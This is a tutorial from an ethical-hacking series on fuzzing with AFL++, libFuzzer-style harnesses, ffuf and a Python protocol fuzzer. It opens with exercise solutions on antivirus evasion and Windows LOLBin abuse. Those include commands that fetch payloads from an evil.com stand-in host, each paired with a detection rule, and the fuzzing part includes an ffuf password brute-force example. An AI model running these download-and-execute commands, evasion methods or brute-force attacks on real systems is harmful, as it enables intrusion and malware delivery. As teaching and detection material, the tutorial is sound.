Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

What will I learn
- What fuzzing is and why it finds bugs that manual testing and code review miss;
- Types of fuzzing -- dumb fuzzing, smart/grammar-based fuzzing, and coverage-guided fuzzing;
- AFL++ (American Fuzzy Lop) -- the industry-standard coverage-guided fuzzer;
- libFuzzer -- in-process fuzzing integrated into the build system;
- Web application fuzzing -- fuzzing HTTP parameters, headers, and API endpoints with ffuf;
- Protocol fuzzing -- sending malformed data to network services;
- Crash analysis and triage -- turning a crash into a vulnerability report;
- Defense: fuzzing your own software before attackers do, integrating fuzzing into CI/CD.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- GCC or Clang installed (for compiling fuzz targets);
- AFL++ installed (apt install afl++ on Debian/Ubuntu);
- The ambition to learn ethical hacking and security research.
Difficulty
- Advanced
Curriculum (of the Learn Ethical Hacking Series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
- Learn Ethical Hacking (#40) - DNS Attacks - Exploiting the Internet's Foundation
- Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike
- Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own
- Learn Ethical Hacking (#43) - Exploit Development Advanced - Modern Mitigations and Bypasses
- Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries
- Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source
- Learn Ethical Hacking (#46) - The Human Factor - Why Security Training Fails
- Learn Ethical Hacking (#47) - Physical Security and OSINT - The Forgotten Attack Vectors
- Learn Ethical Hacking (#48) - Insider Threats - When the Call Is Coming from Inside the House
- Learn Ethical Hacking (#49) - Deepfakes and AI Deception - The New Social Engineering
- Learn Ethical Hacking (#50) - Red Team Operations - Simulating Real Attacks
- Learn Ethical Hacking (#51) - Incident Response - When Things Go Wrong
- Learn Ethical Hacking (#52) - Threat Intelligence - Knowing Your Enemy
- Learn Ethical Hacking (#53) - Security Architecture - Designing Systems That Resist Attack
- Learn Ethical Hacking (#54) - Compliance and Governance - The Business of Security
- Learn Ethical Hacking (#55) - Privacy and Data Protection - GDPR, CCPA, and Beyond
- Learn Ethical Hacking (#56) - Cryptocurrency Security - Attacking and Defending Digital Assets
- Learn Ethical Hacking (#57) - IoT and Embedded Security - Hacking the Physical World
- Learn Ethical Hacking (#58) - The AI Security Landscape - Attacking and Defending AI Systems
- Learn Ethical Hacking (#59) - Python for Pentesters - Automating Everything
- Learn Ethical Hacking (#60) - Zig for Security Tools - When Speed and Memory Matter
- Learn Ethical Hacking (#61) - Writing Custom Scanners - Beyond Off-the-Shelf
- Learn Ethical Hacking (#62) - C2 Frameworks - Building Command and Control
- Learn Ethical Hacking (#63) - Payload Generation and Evasion - Defeating Antivirus
- Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed (this post)
Solutions to Episode 63 Exercises
Exercise 1: Payload encoding evasion test.
Raw msfvenom payload (windows/x64/meterpreter/reverse_tcp):
Windows Defender: DETECTED (Trojan:Win32/Meterpreter)
VirusTotal: 52/72 detected
XOR-encoded + custom C loader (xor_encoder.py -> loader.c, compiled with MinGW):
Windows Defender: NOT DETECTED on initial static scan
VirusTotal: 8/72 detected (mostly heuristic-only vendors)
BUT: Defender behavioral engine caught it at RUNTIME when
shellcode allocated RWX memory and called CreateThread.
Quarantine time: 4.2 seconds after first thread execution.
Conclusion: XOR encoding bypasses static signature detection
completely -- but behavioral detection catches the RWX allocation
pattern before the payload accomplishes anything. Encoding alone
is not sufficient against a modern EDR.
The key lesson from this experiment: the detection layer that matters is NOT the signature scanner (layer 1 from episode 63's architecture overview). It is the behavioral engine (layer 3). The XOR encoder changed every byte of the payload, so the hash and byte-pattern signatures no longer matched. But the fundamental BEHAVIOR -- allocate RWX memory, copy bytes into it, execute -- is a pattern that Defender's behavioral engine recognizes regardless of what the bytes themselves contain. This is why professional evasion (as covered in episode 63) combines encoding with anti-behavioral techniques like two-step allocation, indirect syscalls, and process injection into trusted processes.
Exercise 2: LOLBins analysis (five entries from the LOLBAS project).
1. certutil.exe
Legitimate: certificate management utility
Abuse: certutil -urlcache -split -f http://evil.com/payload.exe C:\tmp\p.exe
Detection: process_creation where Image contains "certutil" AND
(CommandLine contains "urlcache" OR "decode") -- rare in normal ops
2. mshta.exe
Legitimate: execute HTML Applications (.hta files)
Abuse: mshta http://evil.com/payload.hta (downloads + executes HTA)
Detection: mshta.exe with HTTP URL in CommandLine AND
ParentImage not in expected Office apps (unusual parent)
3. MSBuild.exe
Legitimate: build .NET projects from .csproj files
Abuse: inline C# task execution with embedded shellcode loader
Detection: MSBuild.exe where ParentImage NOT devenv.exe AND
NOT msbuild pipeline process -- also: short-lived process,
no actual .csproj file path in CommandLine
4. regsvr32.exe
Legitimate: register COM DLL objects (regsvr32 /s mylib.dll)
Abuse: regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll
loads and executes remote scriptlet -- AppLocker bypass
Detection: regsvr32.exe where CommandLine contains "/i:http"
-- the URL argument is essentially never legitimate
5. wmic.exe
Legitimate: Windows Management Instrumentation query tool
Abuse: wmic process call create "cmd.exe /c payload.exe"
OR wmic os get /format:"http://evil.com/xsl.xsl"
Detection: wmic.exe where CommandLine contains "process call
create" -- or "os get /format" with a URL
The Sigma-style detection rules for LOLBins share a common pattern: they match the ABUSE syntax specifically, not the binary itself. certutil.exe launched normally for certificate inspection generates zero alerts. certutil.exe with -urlcache -split -f and a URL is something I have never seen in legitimate enterprise operations. The same goes for mshta.exe with an HTTP URL -- legitimate HTA files are local, not remote. The LOLBAS project (lolbas-project.github.io) documents exactly these abuse-vs-legitimate distinctions for 200+ Windows binaries, which is the reference for building detection rules that catch abuse without flooding your SIEM with false positives from legitimate use.
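The "match the abuse syntax, not the binary" idea can be sketched in a few lines of Python. This is only an illustration under assumptions: the ABUSE_PATTERNS table and the is_abuse helper are hypothetical names, the regexes are simplified from the five entries above, and a real Sigma rule would also look at parent processes and other fields.

```python
import re

# Hypothetical rule table: binary name -> regex over the command line.
# Patterns are simplified from the five LOLBAS entries discussed above.
ABUSE_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "mshta.exe": re.compile(r"https?://", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://", re.I),
    "wmic.exe": re.compile(r'process\s+call\s+create|/format:\s*"?https?://', re.I),
}

def is_abuse(image: str, command_line: str) -> bool:
    """Return True when a known LOLBin is launched with abuse-style arguments."""
    # Reduce a full Windows path to the lowercase file name.
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    pattern = ABUSE_PATTERNS.get(name)
    return bool(pattern and pattern.search(command_line))

print(is_abuse(r"C:\Windows\System32\certutil.exe",
               "certutil -urlcache -split -f http://evil.com/payload.exe"))
print(is_abuse("certutil.exe", "certutil -dump cert.cer"))
```

The binary name alone never triggers a match; only the combination of binary and argument pattern does, which is what keeps the false-positive rate manageable.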
Exercise 3: Staged loader analysis.
Loader chain: xor_encoder.py -> encrypted payload hosted on
python3 -m http.server 8888 -> staged_loader.py downloads + decrypts + executes
Network indicators an EDR would see:
- Python process making HTTP request to 127.0.0.1:8888 (unusual)
- Python process downloading binary data (Content-Type: application/octet-stream)
- Python process importing ctypes (common, not suspicious alone)
Host-based indicators:
- Python process calling mmap with PROT_EXEC (rare for Python apps)
- Memory page with write+exec permissions in python3 address space
- Unusual memory allocation pattern: mmap -> write -> ctypes cast -> call
Behavioral detections that would trigger:
- ETW: executable memory page created in Python process
- Sysmon Event 10 (ProcessAccess) if injecting vs just executing in-place
- Defender memory scan: shellcode signature in python3 process heap
The staged design is clever in theory -- the encrypted payload never exists on disk, so static scanners see nothing suspicious (a Python script that imports ctypes and requests looks entirely benign). But the runtime execution creates exactly the behavioral signatures that ETW (Event Tracing for Windows, covered in episode 63's defense section) monitors at the kernel level. The mmap(PROT_EXEC) call from Python is particularly unusual -- legitimate Python programs essentially never need executable memory, so any EDR worth deploying will flag it as a high-confidence indicator of in-memory shellcode execution.
Episode 63 was about making payloads that evade antivirus. We covered static detection (signatures, hashes, YARA rules), heuristic detection (suspicious API imports, high entropy), behavioral detection (the sandbox watching what your code DOES, not what it looks like), AMSI for PowerShell, LOLBins for staying off-disk, and the EDR hook architecture that makes all of this work together. The theme across all of it: encoding and obfuscation only buy you time against static analysis. Behavioral detection catches you when you actually do something malicious, regardless of how well-disguised the payload looks.
Today we flip the script completely. Instead of delivering malicious inputs carefully, we deliver malicious inputs AUTOMATICALLY, at machine speed, in volume. We are going to throw millions of garbage inputs at software until it breaks. This is fuzzing, and it is widely regarded as one of the most productive automated techniques for finding vulnerabilities in critical software.
What Fuzzing Actually Is
Fuzzing is the art of throwing garbage at software until it breaks. Not random garbage -- intelligently mutated garbage that explores code paths the developer never anticipated.
The premise starts from an uncomfortable truth: developers test the happy path. They write unit tests for the expected inputs, integration tests for the expected workflows, and maybe a handful of edge cases they can think of off the top of their head. What they do NOT test is the unhappy universe -- the space of all possible malformed, truncated, oversized, corrupted, and structurally invalid inputs that a real-world attacker (or network blip, or buggy client) might send. That space is effectively infinite, and manual testing covers a vanishingly small fraction of it.
Fuzzers attack that untested space systematically. A fuzzer takes valid inputs (seeds), mutates them in every conceivable way (flip bits, add bytes, remove sections, swap fields, insert null bytes, generate boundary values), and feeds each mutation to the target. It does this thousands to hundreds of thousands of times per second, depending on the target. When the target crashes, hangs, or produces an error it shouldn't -- the fuzzer saves the input that caused it. You then analyze that input to find the underlying bug.
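As a rough illustration of the mutation step, here is a minimal sketch of a few mutation operators in Python. The mutate function and its four operators are my own simplification, not how any particular fuzzer implements them; real fuzzers have dozens of operators and stack several per input.

```python
import random

def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Apply one randomly chosen mutation to a copy of the seed."""
    data = bytearray(seed)
    choice = rng.choice(["bitflip", "insert", "delete", "boundary"])
    if choice == "bitflip" and data:
        pos = rng.randrange(len(data))
        data[pos] ^= 1 << rng.randrange(8)            # flip exactly one bit
    elif choice == "insert":
        pos = rng.randrange(len(data) + 1)
        data[pos:pos] = bytes([rng.randrange(256)])   # insert one random byte
    elif choice == "delete" and data:
        del data[rng.randrange(len(data))]            # remove one byte
    elif choice == "boundary" and data:
        pos = rng.randrange(len(data))
        data[pos] = rng.choice([0x00, 0x7F, 0x80, 0xFF])  # classic edge values
    return bytes(data)

rng = random.Random(1234)        # fixed seed so runs are repeatable
seed = b"key=value\n"
samples = [mutate(seed, rng) for _ in range(5)]
for s in samples:
    print(s)
```

Each call produces one slightly damaged copy of the seed; the fuzzer's job is simply to do this in a tight loop and watch what the target does with the result.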
The numbers here are genuinely impressive. Google's OSS-Fuzz -- a continuous fuzzing service for critical open-source software -- has found over 10,000 bugs in 1,000+ projects since 2016, including Firefox, OpenSSL, SQLite, curl, libpng, zlib, and hundreds more. Chrome and the Linux kernel are fuzzed continuously by closely related infrastructure (ClusterFuzz and syzkaller respectively). These are mature, heavily-reviewed codebases with thousands of developer-hours of testing behind them. Fuzzing found bugs that human review missed entirely -- not because the reviewers were careless, but because the bug-triggering input was something no human tester would ever think to construct.
The reason fuzzing finds what code review misses is structural: code review checks for KNOWN bad patterns. Fuzzing discovers UNKNOWN bad behavior by large-scale automated exploration. A reviewer looking at a memcpy call will check if the size parameter looks reasonable in the expected use case. A fuzzer will construct an input that makes the size parameter wrap around to a tiny value when two integers are added together -- an integer overflow that leads to an undersized allocation and a heap buffer overflow that nobody was checking for.
Three Ways to Fuzz
1. Dumb (mutation-based) fuzzing
Take valid input, randomly flip bits, add bytes, remove bytes.
No knowledge of input format. Simple but surprisingly effective
against parsers and decoders that process raw bytes.
Example: take a valid PNG, randomly corrupt bytes, feed to
image parser. PNG parsers have had many bugs found this way.
2. Smart (grammar-based) fuzzing
Understand the input format. Generate inputs that are STRUCTURALLY
valid but contain malformed VALUES within valid structures.
Example: generate valid HTTP requests with overlong headers,
illegal characters in the method field, or a negative
Content-Length. The parser gets past the structure check
and crashes deeper in the logic.
3. Coverage-guided fuzzing (the modern standard)
Instrument the target binary to report which code paths execute.
The fuzzer EVOLVES inputs that trigger new code paths.
If mutation X causes the target to take a branch it has never
taken before, keep that input and mutate it further.
If mutation Y covers no new branches, discard it.
This is evolutionary optimization applied to bug discovery.
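To make the grammar-based category from the list above concrete, here is a small sketch of a generator that keeps the HTTP request layout valid while filling it with hostile values. The METHODS and LENGTHS tables, the header names, and the target.example host are all illustrative assumptions.

```python
import random

METHODS = [b"GET", b"POST", b"G\x00T", b"A" * 300]     # valid and illegal methods
LENGTHS = [b"0", b"-1", b"4294967296", b"abc"]          # hostile Content-Length values

def generate_request(rng: random.Random) -> bytes:
    """Build a request whose layout is valid HTTP/1.1 but whose values are not."""
    header_value = b"x" * rng.choice([1, 64, 8192])     # sometimes overlong
    lines = [
        rng.choice(METHODS) + b" /index.html HTTP/1.1",
        b"Host: target.example",
        b"X-Test: " + header_value,
        b"Content-Length: " + rng.choice(LENGTHS),
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"

rng = random.Random(7)
requests = [generate_request(rng) for _ in range(3)]
for r in requests:
    print(r[:60])
```

Because the line structure and the terminating blank line are always correct, the parser's framing logic accepts the request and the malformed value reaches the code that interprets it.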
Coverage-guided fuzzing is the reason fuzzing went from a useful-but-limited technique to the dominant vulnerability discovery method in modern security research. Dumb fuzzing is effective for simple formats -- it will find crashes in image parsers, audio decoders, and document format handlers relatively quickly. But for complex protocols (TLS, SMB, QUIC) or deeply nested code paths, random mutation will spend the vast majority of its time on inputs that fail early validation checks and never reach the interesting code. Coverage guidance solves this by treating the fuzzing process as a search problem: find the inputs that explore the most code, then build on those. Over hours and days, a coverage-guided fuzzer accumulates a corpus of inputs that collectively exercises an enormous fraction of the target's code -- far beyond what any manual test suite achieves.
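The keep-or-discard feedback loop is easier to see in a toy. In the sketch below, the hypothetical target function returns the set of branch IDs it reached (standing in for compile-time instrumentation) and raises an exception to simulate a crash. Blind random mutation would need to guess four bytes at once; the coverage-guided loop finds them one at a time.

```python
import random

def target(data: bytes) -> set:
    """Toy parser: returns the branch IDs it reached, raises on the 'bug'."""
    hit = {0}
    if len(data) >= 4 and data[0:1] == b"F":
        hit.add(1)
        if data[1:2] == b"U":
            hit.add(2)
            if data[2:3] == b"Z":
                hit.add(3)
                if data[3:4] == b"Z":
                    raise RuntimeError("simulated crash")
    return hit

def fuzz(seed: bytes, max_iters: int, rng: random.Random):
    """Return (crashing_input_or_None, iterations_used, corpus)."""
    corpus = [seed]
    seen = set(target(seed))
    for i in range(max_iters):
        child = bytearray(rng.choice(corpus))
        child[rng.randrange(len(child))] = rng.randrange(256)  # one-byte mutation
        child = bytes(child)
        try:
            coverage = target(child)
        except RuntimeError:
            return child, i + 1, corpus
        if not coverage <= seen:      # reached a branch no earlier input reached
            seen |= coverage
            corpus.append(child)      # keep it and mutate it further
    return None, max_iters, corpus

crash, iters, corpus = fuzz(b"AAAA", 500_000, random.Random(42))
print(crash, iters, corpus)
```

Each corpus entry is a stepping stone: an input that got one comparison further than anything before it. That incremental progress is what lets coverage-guided fuzzers get past multi-byte checks that random mutation essentially never passes.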
AFL++: The Industry Standard
AFL++ (American Fuzzy Lop Plus Plus) is the current reference implementation of coverage-guided fuzzing for native code. It instruments target binaries at compile time to inject branch-coverage tracking code, then runs a feedback loop: mutate, execute, check if new branches were covered, keep or discard.
# Step 1: Compile target with AFL instrumentation
afl-gcc -o target_fuzz target.c
# or with Clang (better instrumentation quality):
afl-clang-fast -o target_fuzz target.c
# Step 2: Create seed corpus (start with valid examples)
mkdir input
echo "hello world" > input/seed1.txt
echo "<html><body>test</body></html>" > input/seed2.txt
# Step 3: Run the fuzzer
afl-fuzz -i input -o output -- ./target_fuzz @@
# @@ = AFL replaces this with the path to the mutated input file
# Step 4: Monitor progress (AFL shows a live dashboard)
# Total executions (millions per hour on fast targets)
# Unique crashes found
# Code coverage (paths discovered)
# Current mutation strategy (havoc, splice, deterministic)
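# Step 5: Analyze crashes
ls output/default/crashes/
# AFL++ stores results per fuzzer instance; "default" is the name used when -M/-S is not given
# Each file is the input that caused a crash
# Reproduce by passing the file as the argument, as @@ did: ./target_fuzz output/default/crashes/id:000000,...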
The AFL status screen deserves special attention because it tells you whether your fuzzing campaign is actually making progress. Paths discovered (labeled "corpus count" in recent AFL++ releases) is the key metric -- it shows how many distinct code paths the fuzzer has found inputs for. If this number is growing steadily, the fuzzer is finding new territory to explore and your corpus is accumulating useful seeds. If it plateaus early (say, at 50 paths for a complex parser that clearly has thousands of branches), your seed corpus is probably too narrow and the fuzzer cannot mutate its way past the early validation logic -- add more diverse seeds.
Stability (shown as a percentage) indicates how consistently the target produces the same coverage bitmap for the same input. 100% means deterministic: the same input always hits the same branches. Stability below 85% often indicates multithreading, reads of uninitialized memory, randomness, or time-dependent behavior -- situations where the coverage signal is noisy and AFL cannot reliably determine whether a mutation found something new. Fixing stability issues (disabling threading for fuzz targets, seeding or stubbing out random number generators and clocks) dramatically improves fuzzing efficiency.
Executions per second varies wildly by target complexity. Simple string parsers run at 200,000-500,000 executions/second. Complex document parsers run at 5,000-50,000. Network protocol code that needs socket setup per iteration might only manage 500. Faster is always better -- more executions per hour means more of the input space explored.
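The same metrics are also written to a plain-text fuzzer_stats file in the output directory, as "key : value" lines, which makes them easy to check from a script. The sketch below parses that layout and flags the two conditions discussed above. The key names in SAMPLE are how I recall them from recent AFL++ releases and should be treated as assumptions (older versions use different names), and the thresholds are simply the figures from this section.

```python
SAMPLE = """\
execs_done        : 9876543
execs_per_sec     : 4321.00
corpus_count      : 812
stability         : 72.40%
saved_crashes     : 3
command_line      : afl-fuzz -i input -o output -- ./target_fuzz @@
"""

def parse_fuzzer_stats(text: str) -> dict:
    """Split 'key : value' lines into a dict of strings."""
    stats = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")   # split on the first colon only
        if sep:
            stats[key.strip()] = value.strip()
    return stats

def health_warnings(stats: dict, min_stability: float = 85.0,
                    min_speed: float = 500.0) -> list:
    """Return human-readable warnings for noisy or slow campaigns."""
    warnings = []
    stability = float(stats.get("stability", "100%").rstrip("%"))
    if stability < min_stability:
        warnings.append(f"stability {stability:.1f}% is below {min_stability:.0f}%")
    speed = float(stats.get("execs_per_sec", "0"))
    if speed < min_speed:
        warnings.append(f"only {speed:.0f} execs/sec")
    return warnings

stats = parse_fuzzer_stats(SAMPLE)
print(stats["corpus_count"], health_warnings(stats))
```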
Writing an AFL Fuzz Harness
AFL needs a fuzz harness -- a wrapper program that reads input from a file and passes it to the function you want to test. The quality of the harness determines the quality of the fuzzing campaign. A badly written harness that returns early on most mutations without actually exercising the target code is useless regardless of how many hours you run it.
// fuzz_harness.c -- wrap a library function for AFL fuzzing
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// The function we want to fuzz (from a library)
extern int parse_config(const char *data, size_t len);
int main(int argc, char **argv) {
    // AFL provides the input file path via @@
    if (argc < 2) return 1;
    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    // Reject ftell errors and oversized inputs
    if (size < 0 || size > 1024 * 1024) { fclose(f); return 1; }
    fseek(f, 0, SEEK_SET);
    // Allocate at least one byte so an empty input does not yield a NULL buffer
    char *buf = malloc(size > 0 ? (size_t)size : 1);
    if (!buf) { fclose(f); return 1; }
    // Pass on only the number of bytes actually read
    size_t n = fread(buf, 1, (size_t)size, f);
    fclose(f);
    // Call the function under test
    parse_config(buf, n);
    free(buf);
    return 0;
}
# Compile with sanitizers for much better crash detection
afl-clang-fast -fsanitize=address,undefined -o fuzz_harness fuzz_harness.c -ltarget
# AddressSanitizer catches: heap/stack/global buffer overflows, use-after-free,
# double-free, each with a precise location
# UndefinedBehaviorSanitizer catches: signed integer overflow, null dereference,
# misaligned memory access, invalid casts
afl-fuzz -i seeds -o findings -m none -- ./fuzz_harness @@
# -m none: disable memory limit (needed with ASAN overhead)
AddressSanitizer is what transforms "the program crashed" into "the program crashed with a heap buffer overflow at offset 8 beyond a 24-byte allocation in parse_config() at line 142". Without sanitizers, a buffer overflow might not crash at all -- the program just writes past the end of its buffer into adjacent memory and keeps running, producing silent corruption. With ASAN, every out-of-bounds access triggers an immediate crash with a detailed report pinpointing the exact allocation, the access offset, and the full call stack. This makes triage dramatically faster -- you go from "something crashed" to "exploitable heap overflow in config parser" in minutes rather than hours of manual analysis.
Web Application Fuzzing with ffuf
ffuf (Fuzz Faster U Fool) is the closest web counterpart to AFL -- it sends large volumes of HTTP requests, substituting wordlist entries at the FUZZ position, and identifies responses that differ from the baseline. Unlike AFL, ffuf is black-box (no source code needed, no instrumentation, no coverage feedback), and it is built specifically for the HTTP use cases a pentester faces daily.
# Directory fuzzing (find hidden paths)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
# Parameter fuzzing (discover hidden GET parameters)
ffuf -u "http://target.com/page?FUZZ=test" -w /usr/share/wordlists/params.txt \
-fs 4242 # filter responses with this size (baseline size for unknown params)
# POST parameter fuzzing
ffuf -u http://target.com/login -X POST \
-d "username=admin&password=FUZZ" \
-w /usr/share/wordlists/rockyou.txt \
-fc 401 # filter 401 responses (wrong password)
# Header fuzzing (find headers the app responds to differently)
ffuf -u http://target.com/ -H "X-Custom-Header: FUZZ" \
-w payloads.txt -fs 0 -mc all # match every status code, hide empty (0-byte) responses
# Virtual host discovery (find hosts on shared infrastructure)
ffuf -u http://target.com/ -H "Host: FUZZ.target.com" \
-w subdomains.txt -fs 0
# Multi-position fuzzing (username + password simultaneously)
ffuf -u http://target.com/login -X POST \
-d "username=FUSER&password=FPASS" \
-w users.txt:FUSER -w passwords.txt:FPASS \
-fc 401 -mode clusterbomb
The response filtering options are what separate useful ffuf output from noise. Without filtering, every request returns a response and you have to manually inspect thousands of results. The -fc (filter HTTP status code), -fs (filter response size), -fl (filter line count), and -fw (filter word count) flags let you define what "normal" looks like and only show you the anomalies. A parameter that returns a response 200 bytes larger than the baseline is interesting -- it might be an undocumented parameter that does something. A path that returns 200 instead of 404 is interesting -- it exists. A header that changes the response significantly is interesting -- the application is using it for something.
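The filtering logic itself is simple enough to sketch. The snippet below is not ffuf's implementation; it only mimics the idea behind -fc and -fs on a list of already-collected results, and it guesses the baseline as the most frequent response size. The Result type and helper names are hypothetical.

```python
from collections import Counter
from typing import NamedTuple

class Result(NamedTuple):
    word: str      # the wordlist entry that was substituted for FUZZ
    status: int    # HTTP status code of the response
    size: int      # response body size in bytes

def most_common_size(results) -> int:
    """Guess the baseline as the response size seen most often."""
    return Counter(r.size for r in results).most_common(1)[0][0]

def filter_anomalies(results, filter_codes=(), filter_sizes=()):
    """Drop responses whose status or size is considered 'normal'."""
    return [r for r in results
            if r.status not in filter_codes and r.size not in filter_sizes]

results = [
    Result("id", 200, 4242),
    Result("page", 200, 4242),
    Result("debug", 200, 4442),   # 200 bytes larger than the rest
    Result("q", 200, 4242),
]
baseline = most_common_size(results)
interesting = filter_anomalies(results, filter_sizes={baseline})
print(baseline, interesting)
```

In practice you would send a handful of requests with nonsense values first, note the size and status they produce, and pass those to -fs and -fc before starting the real run.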
Wordlist selection matters enormously. /usr/share/wordlists/dirb/common.txt has ~4,600 entries -- good for a quick check, misses a lot. SecLists (github.com/danielmiessler/SecLists) is the community-maintained reference: hundreds of wordlists covering directory names, parameter names, API paths, subdomains, common credentials, and more. The Discovery/Web-Content/raft-large-words.txt wordlist has 119,600 entries and finds things that the common wordlist misses entirely.
Protocol Fuzzing
Web fuzzing is high-level -- HTTP is a text protocol and ffuf handles the structure automatically. Protocol fuzzing means sending malformed data directly to network services at the binary level, which requires you to implement the mutation logic yourself.
#!/usr/bin/env python3
"""proto_fuzz.py -- basic protocol fuzzer for TCP services"""
import random
import socket
import sys
def generate_mutations(seed_input):
    """Generate mutated versions of valid input."""
    mutations = []
    # Byte corruption: XOR each position in turn with a random non-zero value
    for i in range(len(seed_input)):
        mutated = bytearray(seed_input)
        mutated[i] ^= random.randint(1, 255)
        mutations.append(bytes(mutated))
    # Buffer overflow attempts
    for length in [256, 1024, 4096, 65535]:
        mutations.append(b'A' * length)
        mutations.append(seed_input + b'A' * length)
    # Format string attempts
    for fmt in [b'%s%s%s%s', b'%x%x%x%x', b'%n%n%n%n']:
        mutations.append(fmt * 20)
    # Null bytes, boundary values, special characters
    mutations.append(b'\x00' * 100)
    mutations.append(b'\xff' * 100)
    mutations.append(seed_input.replace(b'\n', b'\r\n\r\n'))
    # Integer boundary values (classic overflow triggers)
    for val in [b'0', b'-1', b'2147483647', b'4294967295', b'-2147483648']:
        mutations.append(val)
    return mutations
def fuzz_service(host, port, seed_input, iterations=1000):
    """Send mutated inputs to a TCP service."""
    crashes = []
    mutations = generate_mutations(seed_input)
    last_sent = None
    for i in range(iterations):
        mutation = random.choice(mutations)
        try:
            with socket.create_connection((host, port), timeout=3) as s:
                s.sendall(mutation)
                last_sent = mutation
                try:
                    s.recv(4096)  # content is ignored; we only care that the service answers
                except socket.timeout:
                    pass  # slow or silent service, not necessarily a crash
        except ConnectionRefusedError:
            # The port stopped accepting connections, so the PREVIOUS input
            # (the last one actually delivered) is the likely culprit
            print(f"[!] Service stopped accepting connections at iteration {i}!")
            if last_sent is not None:
                crashes.append(last_sent)
            break
        except OSError:
            continue  # resets, timeouts on connect, etc.: try the next mutation
    return crashes
if __name__ == '__main__':
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} HOST PORT [SEED]")
    host = sys.argv[1]
    port = int(sys.argv[2])
    seed = sys.argv[3].encode() if len(sys.argv) > 3 else b'GET / HTTP/1.0\r\n\r\n'
    crashes = fuzz_service(host, port, seed)
    print(f"\n{len(crashes)} crashes found")
    for c in crashes:
        print(f"  Crash input ({len(c)} bytes): {c[:100]}")
The integer boundary values deserve specific emphasis. Many crashes in network services come from integer overflows -- the server reads a length field from the packet, performs arithmetic on it (maybe multiplying by an element size, or adding to a base offset), and the result wraps around to a small or negative value. The attacker sends a count of 1073741825 (0x40000001), the server computes 1073741825 * 4 for 4-byte elements and gets 4 due to 32-bit overflow, allocates a tiny buffer, then copies roughly 4GB of "data" into it. The same thing happens when the server adds a header size or terminator byte to length=4294967295 and the sum wraps to a value near zero. Classic heap overflow. Testing with boundary values (INT_MAX, UINT_MAX, 0, -1) catches a surprising number of these without needing deep coverage guidance.
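Wraparound arithmetic is easy to get wrong in your head, so it is worth checking candidate values before adding them to a fuzzer's dictionary. This sketch emulates 32-bit unsigned arithmetic in Python by masking; the function names are illustrative, and the element size of 4 is an assumption for the example.

```python
MASK32 = 0xFFFFFFFF

def alloc_size_u32(count: int, elem_size: int) -> int:
    """Emulate `uint32_t size = count * elem_size;` as a C compiler would compute it."""
    return (count * elem_size) & MASK32

def checked_alloc_size(count: int, elem_size: int):
    """What a safe server does: return the true size, or None if it overflows 32 bits."""
    size = count * elem_size
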